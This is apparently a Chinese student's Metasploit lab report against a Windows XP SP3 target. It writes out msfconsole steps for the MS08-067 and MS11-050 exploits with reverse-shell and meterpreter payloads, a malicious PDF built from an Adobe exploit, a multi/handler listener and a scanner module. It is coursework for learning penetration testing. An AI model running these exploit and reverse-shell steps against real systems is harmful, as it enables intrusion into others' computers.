标签:完全 src 攻击 加强 png tool 影响 ever 计算
1、 用自己的话解释什么是exploit,payload,encode?
靶机:windows XP SP3,IP地址是172.30.7.99
先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
用use exploit/windows/smb/ms08_067_netapi使用该模块,并用show targets查看可以被攻击的靶机的操作系统型号:
用show payloads查看可以供我们使用的攻击载:
从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:
show options查看需要设置的参数:
show options确认需要设置的参数是否已经设置好:
search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。
show options确认需要设置的参数是否已经设置好:
search adobe查询一下针对该漏洞的攻击模块:
show targets查看可以被攻击的靶机的操作系统型号:
set payload windows/meterpreter/reverse_tcp,设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个csj5338.pdf文件:
use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口
show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:
这次实验总体流程不算难,但在虚拟机上面我换了很多个,换了几个镜像,总算是用简体中文版成功了,学会了MSF工具的一些常用指令,也认识到在实际的渗透过程中,我们不能完全依靠msf来实现,漏洞也都是很早之前的漏洞,其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习,加强自己的专业技能。
标签:完全 src 攻击 加强 png tool 影响 ever 计算
原文地址:https://www.cnblogs.com/Hdywan/p/8970751.html
